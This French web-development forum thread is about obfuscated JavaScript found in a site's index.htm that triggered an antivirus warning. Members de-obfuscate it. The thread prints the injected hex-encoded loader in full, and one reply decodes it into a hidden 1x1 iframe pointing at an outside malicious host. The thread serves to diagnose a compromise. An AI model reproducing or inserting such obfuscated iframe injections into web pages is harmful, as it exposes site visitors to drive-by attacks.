IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

JavaScript Discussion :

qu'est ce que ce code javascript ?


Sujet :

JavaScript

  1. #1
    Membre à l'essai
    Inscrit en
    Juillet 2002
    Messages
    36
    Détails du profil
    Informations forums :
    Inscription : Juillet 2002
    Messages : 36
    Points : 19
    Points
    19
    Par défaut qu'est ce que ce code javascript ?
    Bonjour

    un code javascript est présent dans le fichier index.htm d'un site web
    Le code ci-dessous génère une alerte antivirus lors du chargement de la page.
    Je ne comprend pas comment fonctionne ce code et comment le "décoder".

    je voudrais savoir si c'est un vrai piratage ou une fausse alerte et à quoi correspond le script.

    comment faire ?

    Merci

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    function EBF5831D5ABA9073AFCF9B84E71(EB39726F24D5A9E40016C0D17F159BDE)
    {var DDFC3D2A16632D81A4DFB=16;return(parseInt(EB39726F24D5A9E40016C0D17F159BDE,DDFC3D2A16632D81A4DFB));}
     
    function FE3A897E6F3F1BD7458ADEC2018E6F(E22853B48452875205017F8FE8C){var BDDE003A7780827909AAA0847A1CAB32=2;var AC9F95E8780CE2D3701BF="";for(D12BA9367CD678AD0F2FB59413735=0;D12BA9367CD678AD0F2FB59413735<E22853B48452875205017F8FE8C.length;D12BA9367CD678AD0F2FB59413735+=BDDE003A7780827909AAA0847A1CAB32){AC9F95E8780CE2D3701BF+=(String.fromCharCode(EBF5831D5ABA9073AFCF9B84E71(E22853B48452875205017F8FE8C.substr(D12BA9367CD678AD0F2FB59413735,BDDE003A7780827909AAA0847A1CAB32))));}document.write(AC9F95E8780CE2D3701BF);}FE3A897E6F3F1BD7458ADEC2018E6F("3C696672616D65207372633D22687474703A2F2F6261316F6E2E696E666F2F73706C222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");

  2. #2
    Expert confirmé
    Avatar de RomainVALERI
    Homme Profil pro
    POOête
    Inscrit en
    Avril 2008
    Messages
    2 652
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 47
    Localisation : France, Meurthe et Moselle (Lorraine)

    Informations professionnelles :
    Activité : POOête

    Informations forums :
    Inscription : Avril 2008
    Messages : 2 652
    Points : 4 164
    Points
    4 164
    Par défaut
    C'est du code généré, ou même plus probablement du code "obfusqué" pour cacher sa fonction réelle : il y a en effet une possibilité pour que ce code soit malveillant, mais comment le savoir sans connaître comment ces variables sont alimentées... ? ^^
    En tout cas ce code ne peut faire aucun mal tant qu'il n'est pas appelé depuis une page ou un autre js...

  3. #3
    Rédacteur/Modérateur

    Avatar de SpaceFrog
    Homme Profil pro
    Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Bidouilleur SharePoint
    Inscrit en
    Mars 2002
    Messages
    39 640
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 74
    Localisation : Royaume-Uni

    Informations professionnelles :
    Activité : Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Bidouilleur SharePoint
    Secteur : Industrie

    Informations forums :
    Inscription : Mars 2002
    Messages : 39 640
    Points : 66 663
    Points
    66 663
    Billets dans le blog
    1
    Par défaut
    avec un paquet de replace tu peux t'amuser à remplacer les variable pour eclaircir un peu le code
    en commençant par les plus longues

  4. #4
    Membre régulier

    Profil pro
    Inscrit en
    Février 2008
    Messages
    77
    Détails du profil
    Informations personnelles :
    Localisation : France, Vienne (Poitou Charente)

    Informations forums :
    Inscription : Février 2008
    Messages : 77
    Points : 111
    Points
    111
    Par défaut
    Je trouve ceci :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
     
    function fct1(param1)
    {
    return(parseInt(param1,16));
    }
    function fct2(param2)
    {
    var v1 = 2;
    var v2 = '';
    for(i=0;i<param2.length;i+=v1) {
       v2+=(String.fromCharCode (fct1(param2.substr(i,v1))));
       }
    document.write(v2);
    }
    fct2("3C696672616D65207372633D22687474703A2F2F6261316F6E2E696E666F2F73706C222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
    Ce qui fait reagir mon antivirus: virus de script HTML/Infected.WebPage.Gen
    Je n'ai pas executé le code mais si je converti la chaine transmise à la fct2 d'HEX en ASCII j'obtiens :
    <iframe src="http://ba1on.info/spl" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

  5. #5
    Rédacteur/Modérateur

    Avatar de SpaceFrog
    Homme Profil pro
    Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Bidouilleur SharePoint
    Inscrit en
    Mars 2002
    Messages
    39 640
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 74
    Localisation : Royaume-Uni

    Informations professionnelles :
    Activité : Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Bidouilleur SharePoint
    Secteur : Industrie

    Informations forums :
    Inscription : Mars 2002
    Messages : 39 640
    Points : 66 663
    Points
    66 663
    Billets dans le blog
    1
    Par défaut
    pinaise vous m'en faites une bande d'antihackers asthmatiques ^^

    essaye juste de remplacer le document.write par un alert tu comprendras vite ...

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

  1. Est ce que ce code est optimisé.
    Par Andry dans le forum Langage
    Réponses: 4
    Dernier message: 13/03/2009, 22h06
  2. Est ce que ce code est correct ?
    Par foot.c dans le forum Débuter
    Réponses: 6
    Dernier message: 12/05/2008, 01h49
  3. Réponses: 1
    Dernier message: 08/02/2007, 09h11
  4. [Dates] calcul de date est ce que mon code est bon?
    Par carmen256 dans le forum Langage
    Réponses: 2
    Dernier message: 09/06/2006, 11h30

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo